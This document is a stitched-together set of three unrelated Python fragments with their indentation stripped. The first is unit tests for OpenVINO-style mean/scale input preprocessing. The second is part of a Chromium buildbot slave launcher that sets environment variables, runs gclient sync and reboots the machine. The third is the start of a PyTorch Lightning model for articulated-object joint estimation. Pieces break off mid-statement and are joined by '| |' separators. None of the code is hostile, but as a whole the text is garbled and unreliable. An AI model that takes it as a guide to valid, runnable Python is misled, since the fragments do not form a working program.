relu1 = ops.relu(input1)
res1 = ops.result(relu1, "res1")
res1.get_output_tensor(0).set_names({'res1', 'res1a'})
input2 = ops.parameter(shape2, dtype=dtype2, name="input2")
input2.get_output_tensor(0).set_names({'input2', 'input2a'})
relu2 = ops.relu(input2)
res2 = ops.result(relu2, "res2")
res2.get_output_tensor(0).set_names({'res2', 'res2a'})
function = Model(results=[res1, res2], parameters=[input1, input2], name="TestFunction")
return function
def create_function1(shape1=[2, 2]):
input1 = ops.parameter(shape1, dtype=np.float32, name="input1")
input1.get_output_tensor(0).set_names({'input1a', 'input1b'})
relu1 = ops.relu(input1)
res1 = ops.result(relu1, "res1")
res1.get_output_tensor(0).set_names({'res1', 'res1a'})
function = Model(results=[res1], parameters=[input1], name="TestFunction")
return function
def process_function(ov_function: Model, argv: Namespace):
apply_preprocessing(ov_function=ov_function, argv=argv)
class TestPreprocessingMOC(unittest.TestCase):
def setUp(self):
pass
def check_constant(self, const_node, expected, shape=None):
self.assertEqual(const_node.get_type_name(), 'Constant')
self.assertTrue(np.allclose(const_node.get_vector(), expected))
if shape is not None:
assert const_node.shape == PartialShape(shape)
def check_scale_constant(self, node, expected, shape=None):
const_node = node.input(1).get_source_output().get_node()
if node.get_type_name() != 'Divide':
expected = 1. / expected
self.check_constant(const_node, expected, shape)
def check_mean_constant(self, node, expected, shape=None):
const_node = node.input(1).get_source_output().get_node()
if node.get_type_name() != 'Subtract':
expected = -expected.toList()
self.check_constant(const_node, expected, shape)
def test_scale_single_value(self):
argv = Namespace(mean_scale_values=None, scale=2.0)
function = create_function2()
process_function(ov_function=function, argv=argv)
for param in function.get_parameters():
op_node = list(param.output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, [2.0])
def test_scale_single_value_fp64(self):
argv = Namespace(mean_scale_values=None, scale=2.0)
function = create_function2(dtype1=np.float64)
process_function(ov_function=function, argv=argv)
for ov_input in function.inputs:
op_node = list(ov_input.get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, [2.0])
def test_scale_single_value_fp16(self):
argv = Namespace(mean_scale_values=None, scale=2.0)
function = create_function2(dtype1=np.float16)
process_function(ov_function=function, argv=argv)
for ov_input in function.inputs:
op_node = list(ov_input.get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
def test_scale_vector(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([4.]), 'mean': None}}, scale=None)
function = create_function2()
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, [4.0], shape=None)
# Verify that input2 is not affected
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
def test_scale_vector3(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([2., 4., 8.]), 'mean': None}}, scale=None)
function = create_function2(shape1=[1, 3, 224, 224])
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[2., 4., 8.], shape=[1, 3, 1, 1])
# Verify that input2 is not affected
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
# Verify that guessed layout (?C??) is not appeared in input1
self.assertEqual(function.get_parameters()[0].layout, Layout())
def test_scale_vector4_layout(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([2., 4., 8., 9.]), 'mean': None}},
layout_values={'input1': {'source_layout': 'nhwc'}},
scale=None)
function = create_function2(shape1=[1, 3, 3, 4]) # Use layout to determine channels dim
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[2., 4., 8., 9.], shape=[1, 1, 1, 4])
# Verify that input2 is not affected
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
# Verify that layout (NHWC) is appeared in input1
self.assertEqual(function.get_parameters()[0].layout, Layout('nhwc'))
def test_mean_single(self):
argv = Namespace(mean_scale_values={'input1': {'mean': np.array([4.]), 'scale': None}}, scale=None)
function = create_function2()
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, [4.0], shape=None)
# Verify that input2 is not affected
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
def test_mean_single_fp64(self):
argv = Namespace(mean_scale_values={'input1': {'mean': np.array([4.]), 'scale': None}}, scale=None)
function = create_function2(dtype1=np.float64)
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, [4.0], shape=None)
# Verify that input2 is not affected
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
def test_mean_single_fp16(self):
argv = Namespace(mean_scale_values={'input1': {'mean': np.array([4.]), 'scale': None}}, scale=None)
function = create_function2(dtype1=np.float16)
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
# Verify that input2 is not affected
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
def test_mean_vector3(self):
argv = Namespace(mean_scale_values={'input2': {'mean': np.array([2., 4., 8.]), 'scale': None}}, scale=None)
function = create_function2(shape2=[1, 3, 224, 224])
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[2., 4., 8.], shape=[1, 3, 1, 1])
# Verify that input1 is not affected
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
# Verify that guessed layout (?C??) is not appeared in input2
self.assertEqual(function.get_parameters()[1].layout, Layout())
def test_mean_scale(self):
argv = Namespace(mean_scale_values={'input2a': {'mean': np.array([1., 2., 3.]),
'scale': np.array([2., 4., 8.])}},
scale=None)
function = create_function2(shape2=[1, 3, 224, 224])
process_function(ov_function=function, argv=argv)
# Verify that first is 'subtract mean', then 'scale'
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[1., 2., 3.], shape=[1, 3, 1, 1])
op_node = list(op_node.output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[2., 4., 8.], shape=[1, 3, 1, 1])
# Verify that input1 is not affected
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
# Verify that guessed layout (?C??) is not appeared in input2
self.assertEqual(function.get_parameters()[1].layout, Layout())
def test_mean_scale_with_layout(self):
argv = Namespace(mean_scale_values={'input2a': {'mean': np.array([1., 2., 3., 4.]),
'scale': np.array([2., 4., 8., 9.])}},
scale=None)
function = create_function2(shape2=[1, 3, 3, 4])
function.get_parameters()[1].layout = Layout("NHWC")
process_function(ov_function=function, argv=argv)
# Verify that first is 'subtract mean', then 'scale'
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[1., 2., 3., 4.], shape=[1, 1, 1, 4])
op_node = list(op_node.output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[2., 4., 8., 9.], shape=[1, 1, 1, 4])
# Verify that input1 is not affected
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
# Verify that layout presents in function after preprocessing
self.assertEqual(function.get_parameters()[1].layout, Layout("NHWC"))
def test_mean_scale_with_layout_dynamic(self):
argv = Namespace(mean_scale_values={'input2a': {'mean': np.array([1., 2., 3., 4.]),
'scale': np.array([2., 4., 8., 9.])}},
scale=None)
function = create_function2(shape2=[-1, -1, -1, -1])
function.get_parameters()[1].layout = Layout("NHWC")
process_function(ov_function=function, argv=argv)
# Verify that first is 'subtract mean', then 'scale'
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[1., 2., 3., 4.], shape=[1, 1, 1, 4])
op_node = list(op_node.output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[2., 4., 8., 9.], shape=[1, 1, 1, 4])
# Verify that input1 is not affected
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertEqual(op_node.get_type_name(), 'Relu')
# Verify that layout presents in function after preprocessing
self.assertEqual(function.get_parameters()[1].layout, Layout("NHWC"))
def test_no_param_name(self):
argv = Namespace(mean_scale_values=list(np.array([(np.array([1., 2., 3.]), np.array([2., 4., 6.])),
(np.array([7., 8., 9.]), None)],
dtype='object')), scale=None)
function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 224, 224, 3])
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[1., 2., 3.], shape=[1, 3, 1, 1])
op_node = list(op_node.output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[2., 4., 6.], shape=[1, 3, 1, 1])
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[7., 8., 9.], shape=[1, 1, 1, 3])
# Verify that guessed layouts are not appeared in inputs
self.assertEqual(function.get_parameters()[0].layout, Layout())
self.assertEqual(function.get_parameters()[1].layout, Layout())
def test_no_param_name_single_value(self):
argv = Namespace(mean_scale_values=list(np.array([(np.array([1.]), None),
(np.array([2., 3., 4.]), np.array([5.]))],
dtype='object')), scale=None)
function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 224, 224, 3])
process_function(ov_function=function, argv=argv)
op_node = list(function.get_parameters()[0].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[1.], shape=None)
op_node = list(function.get_parameters()[1].output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Subtract' or op_node.get_type_name() == 'Add')
self.check_mean_constant(op_node, expected=[2., 3., 4.], shape=[1, 1, 1, 3])
op_node = list(op_node.output(0).get_target_inputs())[0].get_node()
self.assertTrue(op_node.get_type_name() == 'Divide' or op_node.get_type_name() == 'Multiply')
self.check_scale_constant(op_node, expected=[5.], shape=None)
# Two inputs, but 'mean_scale_value' has only one array
def test_error_no_param_name_number_not_match(self):
argv = Namespace(mean_scale_values=[(np.array([2., 3.]), np.array([4.]))], scale=None)
function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 2, 224, 224])
with self.assertRaisesRegex(Error, '.*question.*61.*'):
process_function(ov_function=function, argv=argv)
def test_mean_scale_error_no_node_name_found(self):
argv = Namespace(mean_scale_values={'not_found': {'scale': np.array([1.]), 'mean': np.array([1.])}},
scale=None)
function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 2, 224, 224])
with self.assertRaisesRegex(Error, '.*question.*83.*'):
process_function(ov_function=function, argv=argv)
def test_layout_error_no_node_name_found(self):
argv = Namespace(layout_values={'not_found': {'source_layout': 'nhwc'}},
scale=None)
function = create_function2(shape1=[1, 3, 224, 224], shape2=[1, 2, 224, 224])
with self.assertRaisesRegex(Error, '.*question.*83.*'):
process_function(ov_function=function, argv=argv)
def test_error_dimension_mismatch(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([1., 2., 3., 4.]), 'mean': None}},
scale=None)
function = create_function2(shape1=[1, 3, 224, 224])
with self.assertRaises(Exception):
process_function(ov_function=function, argv=argv)
def test_error_dimension_not_clear(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([1., 2., 3.]), 'mean': None}},
scale=None)
function = create_function2(shape1=[1, 3, 3, 3]) # Not clear to which 3 should scale be applied
with self.assertRaises(Exception):
process_function(ov_function=function, argv=argv)
def test_error_dimension_mismatch_with_scale(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([1., 2., 3., 4.]),
'mean': np.array([1., 2., 3.])}},
scale=None)
function = create_function2(shape1=[1, 3, 4, 224])
with self.assertRaises(Exception):
process_function(ov_function=function, argv=argv)
def test_error_guess_c_wrong_position_3d(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([1., 2., 3.]),
'mean': np.array([1., 2., 3.])}},
scale=None)
function = create_function2(shape1=[2, 3, 4])
with self.assertRaises(Exception):
process_function(ov_function=function, argv=argv)
def test_error_guess_c_wrong_position_4d(self):
argv = Namespace(mean_scale_values={'input1': {'scale': np.array([1., 2., 3.]),
'mean': np.array([1., 2., 3.])}},
scale=None)
function = create_function2(shape1=[1, 2, 3, 4])
with | |
not _CheckTwistdRuns(twistd_pid_file)):
print 'Spawning slave in %s' % bot_slavedir
subprocess.check_call(['make', 'start'], cwd=bot_slavedir)
if '--nodaemon' in sys.argv:
# Block on liveliness of the subdir buildbots if called with --nodaemon.
_CheckSubdirBuildbotLiveliness()
return True
def GetThirdPartyVersions(master):
"""Checks whether the master to which this slave belongs specifies particular
versions of buildbot and twisted for its slaves to run. If not specified,
this function returns default values.
"""
bb_ver = 'buildbot_slave_8_4'
tw_ver = 'twisted_10_2'
if master:
bb_ver = getattr(master, 'buildslave_version', bb_ver)
tw_ver = getattr(master, 'twisted_version', tw_ver)
print 'Using %s and %s' % (bb_ver, tw_ver)
return (bb_ver, tw_ver)
def error(msg):
print >> sys.stderr, msg
sys.exit(1)
def GetBotoFilePath(build=BUILD_DIR):
return os.path.join(build, 'site_config', '.boto')
def UseBotoPath():
"""Mutate the environment to reference the prefered gs credentials."""
# If the boto file exists, make sure gsutil uses this boto file.
if os.path.exists(GetBotoFilePath()):
os.environ['AWS_CREDENTIAL_FILE'] = GetBotoFilePath()
os.environ['BOTO_CONFIG'] = GetBotoFilePath()
def main():
# Use adhoc argument parsing because of twisted's twisted argument parsing.
# Change the current directory to the directory of the script.
os.chdir(SCRIPT_DIR)
depot_tools = os.path.join(ROOT_DIR, 'depot_tools')
if not os.path.isdir(depot_tools):
error('You must put a copy of depot_tools in %s' % depot_tools)
bot_password_file = os.path.normpath(
os.path.join(BUILD_DIR, 'site_config', '.bot_password'))
if not os.path.isfile(bot_password_file):
error('You forgot to put the password at %s' % bot_password_file)
if SpawnSubdirBuildbotsIfNeeded():
# If subdir buildbots were used, don't spawn the root process.
return
# Make sure the current python path is absolute.
old_pythonpath = os.environ.get('PYTHONPATH', '')
os.environ['PYTHONPATH'] = ''
for path in old_pythonpath.split(os.pathsep):
if path:
os.environ['PYTHONPATH'] += os.path.abspath(path) + os.pathsep
# Update the python path.
python_path = [
os.path.join(BUILD_DIR, 'site_config'),
os.path.join(BUILD_DIR, 'scripts'),
os.path.join(BUILD_DIR, 'scripts', 'release'),
os.path.join(BUILD_DIR, 'third_party'),
os.path.join(BUILD_DIR, 'third_party', 'google_api_python_client'),
os.path.join(BUILD_DIR, 'third_party', 'httplib2', 'python2'),
os.path.join(BUILD_DIR, 'third_party', 'infra_libs'),
os.path.join(BUILD_DIR, 'third_party', 'oauth2client'),
os.path.join(BUILD_DIR, 'third_party', 'pyasn1'),
os.path.join(BUILD_DIR, 'third_party', 'pyasn1-modules'),
os.path.join(BUILD_DIR, 'third_party', 'python-rsa'),
os.path.join(BUILD_DIR, 'third_party', 'requests_2_10_0'),
os.path.join(BUILD_DIR, 'third_party', 'setuptools-0.6c11'),
os.path.join(BUILD_DIR, 'third_party', 'site-packages'),
os.path.join(BUILD_DIR, 'third_party', 'uritemplate'),
os.path.join(ROOT_DIR, 'build_internal', 'site_config'),
os.path.join(ROOT_DIR, 'build_internal', 'symsrc'),
SCRIPT_DIR, # Include the current working directory by default.
]
# Need to update sys.path prior to the following imports. Remove any
# dist-packages and site-packages directories from the path - we want all our
# dependencies to come from third_party, not from random packages that happen
# to be installed on the machine. We want to *remove* the paths (rather than
# just being before them) because conflicts occur when a module is found in
# multiple locations on the path. In particular this causes problems when
# google-protobuf is installed as a system package (often at an earlier
# version than ours in third_party). It uses setuptools to make "google" a
# namespace package, and importing google.protobuf then gets us the wrong one.
if sys.platform == 'win32':
# Don't remove site-packages on Windows. pywin32 is in there, which is
# needed by twisted.
filtered_sys_path = sys.path
else:
filtered_sys_path = [
x for x in sys.path
if 'dist-packages' not in x and 'site-packages' not in x]
sys.path = python_path + filtered_sys_path
import slave.bootstrap
import config_bootstrap
active_slavename = chromium_utils.GetActiveSlavename()
config_bootstrap.Master.active_slavename = active_slavename
active_master_class_name = chromium_utils.GetActiveMaster(active_slavename)
if not active_master_class_name:
raise RuntimeError('*** Failed to detect the active master')
active_master = GetActiveMasterClass(
active_master_class_name, slave.bootstrap, config_bootstrap)
active_subdir = chromium_utils.GetActiveSubdir()
bb_ver, tw_ver = GetThirdPartyVersions(active_master)
python_path.append(os.path.join(BUILD_DIR, 'third_party', bb_ver))
python_path.append(os.path.join(BUILD_DIR, 'third_party', tw_ver))
sys.path = python_path[-2:] + sys.path
os.environ['PYTHONPATH'] = (
os.pathsep.join(python_path) + os.pathsep + os.environ['PYTHONPATH'])
os.environ['CHROME_HEADLESS'] = '1'
os.environ['PAGER'] = 'cat'
# Platform-specific initialization.
if sys.platform.startswith('win'):
# list of all variables that we want to keep
env_var = [
'APPDATA',
'BUILDBOT_ARCHIVE_FORCE_SSH',
'CHROME_HEADLESS',
'CHROMIUM_BUILD',
'CLASSPATH',
'COMMONPROGRAMFILES',
'COMMONPROGRAMFILES(X86)',
'COMMONPROGRAMW6432',
'COMPUTERNAME',
'COMSPEC',
'DBUS_SESSION_BUS_ADDRESS',
'DEPOT_TOOLS_GIT_BLEEDING',
'DXSDK_DIR',
'GIT_USER_AGENT',
'HOME',
'HOMEDRIVE',
'HOMEPATH',
'JAVA_HOME',
'JDK_HOME',
'JRE_HOME',
'LOCALAPPDATA',
'NUMBER_OF_PROCESSORS',
'OS',
'PATH',
'PATHEXT',
'PROCESSOR_ARCHITECTURE',
'PROCESSOR_ARCHITEW6432',
'PROCESSOR_IDENTIFIER',
'PROGRAMFILES',
'PROGRAMFILES(X86)',
'PROGRAMW6432',
'PYTHONPATH',
'PYTHONUNBUFFERED',
'SYSTEMDRIVE',
'SYSTEMROOT',
'TEMP',
'TESTING_MASTER',
'TESTING_MASTER_HOST',
'TESTING_SLAVENAME',
'TMP',
'USERDOMAIN',
'USERNAME',
'USERPROFILE',
'VS100COMNTOOLS',
'VS110COMNTOOLS',
'WINDIR',
]
remove_all_vars_except(os.environ, env_var)
# Extend the env variables with the chrome-specific settings. Tailor the
# slave process' (and derivative tasks') PATH environment variable.
slave_path = [
depot_tools,
# Reuse the python executable used to start this script.
os.path.dirname(sys.executable),
os.path.join(os.environ['SYSTEMROOT'], 'system32'),
os.path.join(os.environ['SYSTEMROOT'], 'system32', 'WBEM'),
# Use os.sep to make this absolute, not relative.
os.path.join(os.environ['SYSTEMDRIVE'], os.sep, 'Program Files',
'7-Zip'),
# TODO(hinoka): Remove this when its no longer needed crbug.com/481695
os.path.join(os.environ['SYSTEMDRIVE'], os.sep, 'cmake', 'bin'),
]
# Include Windows PowerShell in PATH, if defined.
def which_path(cmd):
path = chromium_utils.Which(cmd)
return ([os.path.dirname(os.path.abspath(path))] if path else [])
slave_path += which_path('powershell.exe')
# build_internal/tools contains tools we can't redistribute.
tools = os.path.join(ROOT_DIR, 'build_internal', 'tools')
if os.path.isdir(tools):
slave_path.append(os.path.abspath(tools))
if 'JAVA_HOME' in os.environ:
slave_path.append(os.path.join(os.environ['JAVA_HOME'], 'bin'))
os.environ['PATH'] = os.pathsep.join(slave_path)
os.environ['LOGNAME'] = os.environ['USERNAME']
elif sys.platform in ('darwin', 'posix', 'linux2'):
# list of all variables that we want to keep
env_var = [
'CCACHE_DIR',
'CHROME_ALLOCATOR',
'CHROME_HEADLESS',
'CHROME_VALGRIND_NUMCPUS',
'CLASSPATH',
'DISPLAY',
'DISTCC_DIR',
'GIT_USER_AGENT',
'HOME',
'HOSTNAME',
'HTTP_PROXY',
'http_proxy',
'HTTPS_PROXY',
'JAVA_HOME',
'JDK_HOME',
'JRE_HOME',
'LANG',
'LOGNAME',
'PAGER',
'PATH',
'PWD',
'PYTHONPATH',
'PYTHONUNBUFFERED',
'SHELL',
'SSH_AGENT_PID',
'SSH_AUTH_SOCK',
'SSH_CLIENT',
'SSH_CONNECTION',
'SSH_TTY',
'TESTING_MASTER',
'TESTING_MASTER_HOST',
'TESTING_SLAVENAME',
'TMPDIR',
'USER',
'USERNAME',
]
remove_all_vars_except(os.environ, env_var)
slave_path = [
os.path.join(os.path.expanduser('~'), 'slavebin'),
depot_tools,
]
# Git on mac is installed from git-scm.com/download/mac
if sys.platform == 'darwin' and os.path.isdir('/usr/local/git/bin'):
slave_path.append('/usr/local/git/bin')
slave_path += [
# Reuse the python executable used to start this script.
os.path.dirname(sys.executable),
'/usr/bin', '/bin', '/usr/sbin', '/sbin', '/usr/local/bin'
]
if 'JAVA_HOME' in os.environ:
slave_path.append(os.path.join(os.environ['JAVA_HOME'], 'bin'))
os.environ['PATH'] = os.pathsep.join(slave_path)
else:
error('Platform %s is not implemented yet' % sys.platform)
# Export the active master name in the enviornment. We do this because some
# scripts actually rely on this value, and it is not available otherwise.
#
# XXX: This is a BuildBot transition hack. Please do NOT use these variables.
# They will go away and if you use them, we're not going to fix your code; it
# will just break.
os.environ['INFRA_BUILDBOT_MASTER_CLASS_NAME'] = active_master_class_name
os.environ['INFRA_BUILDBOT_SLAVE_NAME'] = active_slavename
os.environ['INFRA_BUILDBOT_SLAVE_ACTIVE_SUBDIR'] = active_subdir or ''
git_exe = 'git' + ('.bat' if sys.platform.startswith('win') else '')
try:
git_version = subprocess.check_output([git_exe, '--version'])
except (OSError, subprocess.CalledProcessError) as e:
Log('WARNING: Could not get git version information: %r' % e)
git_version = '?'
# Add some extra information to the git User-Agent string to allow for
# logging/debugging on the server side.
# This string needs to begin with git/X.Y.Z otherwise for certain servers
# (e.g. github) fail to recognize the request as coming from git.
os.environ.setdefault('GIT_USER_AGENT', 'git/%s %s %s' % (
git_version.rstrip().split()[-1], sys.platform, socket.getfqdn()))
# This may be redundant, unless this is imported and main is called.
UseBotoPath()
# This envrionment is defined only when testing the slave on a dev machine.
is_testing = 'TESTING_MASTER' in os.environ
HotPatchSlaveBuilder(is_testing)
import twisted.scripts.twistd as twistd
twistd.run()
shutdown_file = os.path.join(os.path.dirname(__file__), 'shutdown.stamp')
if os.path.isfile(shutdown_file):
# If this slave is being shut down gracefully, don't reboot it.
try:
os.remove(shutdown_file)
# Only disable reboot if the file can be removed. Otherwise, the slave
# might get stuck offline after every build.
global needs_reboot
needs_reboot = False
except OSError:
Log('Could not delete graceful shutdown signal file %s' % shutdown_file)
# Although prevent_reboot_file looks similar to shutdown_file above, it is not
# the same as shutdown.stamp is actually used by Buildbot to shut down the
# slave process, while ~/no_reboot prevents rebooting the slave machine.
prevent_reboot_file = os.path.join(os.path.expanduser('~'), 'no_reboot')
if needs_reboot:
if not os.path.isfile(prevent_reboot_file):
# Send the appropriate system shutdown command.
Reboot()
# This line should not be reached.
else:
Log('Reboot was prevented by %s. Please remove the file and reboot the '
'slave manually to resume automatic reboots.' % prevent_reboot_file)
def EnvWithDepotTools(**kwargs):
"""Returns the current environment with depot_tools appended to the PATH."""
depot_tools_path = os.path.join(ROOT_DIR, 'depot_tools')
path = os.environ.get('PATH', '')
return dict(
os.environ, PATH=os.pathsep.join([path, depot_tools_path]), **kwargs)
def GetGClientPath():
"""Returns path to local gclient executable."""
gclient_path = os.path.join(ROOT_DIR, 'depot_tools', 'gclient')
if sys.platform.startswith('win'):
return gclient_path + '.bat'
if not os.path.isfile(gclient_path):
raise RuntimeError('gclient not found. Check that depot_tools is '
'properly installed')
return gclient_path
def CreateForwardSignalHandler(popen_object, signal_to_send):
"""Returns a signal handler that sends a given signal to a given process."""
def _SignalHandler(signal_received, _frame):
Log('Received signal %s. Send a signal %s to pid %s' %
(signal_received, signal_to_send, popen_object.pid))
popen_object.send_signal(signal_to_send)
return _SignalHandler
if '__main__' == __name__:
skip_sync_arg = '--no-gclient-sync'
if skip_sync_arg not in sys.argv:
UseBotoPath()
if subprocess.call(
[GetGClientPath(), 'sync', '--force', '--break_repo_locks'],
env=EnvWithDepotTools()) != 0:
| |
import json
import os
from copy import deepcopy
from pprint import pprint
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import trimesh
from torch import nn, optim
from torchmetrics import AverageMeter, Precision, Recall
from src.models.modules import create_network
from src.models.modules.losses_dense_joint import PrismaticLoss, RevoluteLoss
from src.third_party.ConvONets.conv_onet.generation_two_stage import Generator3D
from src.utils import utils
from src.utils.chamfer import compute_trimesh_chamfer
from src.utils.joint_estimation import (
aggregate_dense_prediction_r,
eval_joint_p,
eval_joint_r,
)
from src.utils.misc import get_gt_mesh_from_data
from src.utils.visual import as_mesh
log = utils.get_logger(__name__)
# different head for occupancy and segmentation
# predict dense joint
class GeoArtModelV0(pl.LightningModule):
def __init__(self, opt, network):
super().__init__()
self.opt = opt
for k, v in opt.hparams.items():
self.hparams[k] = v
self.save_hyperparameters(self.hparams)
self.model = create_network(network)
self.cri_cls = nn.BCEWithLogitsLoss()
self.cri_joint_p = PrismaticLoss(self.hparams)
self.cri_joint_r = RevoluteLoss(self.hparams)
self.occ_pr_meter = Precision(average="micro")
self.occ_rc_meter = Recall(average="micro")
self.seg_pr_meter = Precision(average="micro")
self.seg_rc_meter = Recall(average="micro")
self.occ_iou_meter = AverageMeter()
self.seg_iou_meter = AverageMeter()
self.revoluted_axis_ori_meter = AverageMeter()
self.revoluted_degree_meter = AverageMeter()
self.revoluted_p2l_ori_meter = AverageMeter()
self.revoluted_p2l_dist_meter = AverageMeter()
self.revoluted_displacement_meter = AverageMeter()
self.prismatic_axis_ori_meter = AverageMeter()
self.prismatic_offset_meter = AverageMeter()
def forward(self, *args):
return self.model(*args)
def training_step(self, data, batch_idx):
(
logits_occ,
logits_seg,
logits_joint_type,
joint_param_revolute,
joint_param_prismatic,
) = self(data["pc_start"], data["pc_end"], data["p_occ"], data["p_seg"])
joint_label = data["joint_type"].unsqueeze(-1).repeat(1, data["p_seg"].size(1))
loss_occ = self.cri_cls(logits_occ, data["occ_label"].float())
loss_seg = self.cri_cls(logits_seg, data["seg_label"].float())
loss_joint_cls = self.cri_cls(logits_joint_type, joint_label.float())
joint_p_axis = joint_param_prismatic[:, :, :3]
joint_p_t = joint_param_prismatic[:, :, 3]
joint_r_axis = joint_param_revolute[:, :, :3]
joint_r_t = joint_param_revolute[:, :, 3]
joint_r_p2l_vec = joint_param_revolute[:, :, 4:7]
joint_r_p2l_dist = joint_param_revolute[:, :, 7]
gt_t = data["state_end"] - data["state_start"]
loss_prismatic, _ = self.cri_joint_p(
data["seg_label"].float(),
joint_p_axis,
joint_p_t,
data["screw_axis"],
gt_t,
)
loss_revolute, _ = self.cri_joint_r(
data["p_seg"],
data["seg_label"].float(),
joint_r_axis,
joint_r_t,
joint_r_p2l_vec,
joint_r_p2l_dist,
data["screw_axis"],
gt_t,
data["p2l_vec"],
data["p2l_dist"],
)
if data["joint_type"].sum() == 0:
# revolute only
loss_joint_param = loss_revolute.mean()
elif data["joint_type"].mean() == 1:
# prismatic only
loss_joint_param = loss_prismatic.mean()
else:
mask_reg = F.one_hot(data["joint_type"].long(), num_classes=2)
loss_joint_param = (
torch.stack((loss_revolute, loss_prismatic), dim=1) * mask_reg
)
loss_joint_param = loss_joint_param.sum(-1).mean()
loss = (
self.hparams.loss_weight_occ * loss_occ
+ self.hparams.loss_weight_seg * loss_seg
+ self.hparams.loss_weight_joint_type * loss_joint_cls
+ self.hparams.loss_weight_joint_param * loss_joint_param
)
# loss = loss_occ
self.log("train/loss_occ", loss_occ)
self.log("train/loss_seg", loss_seg)
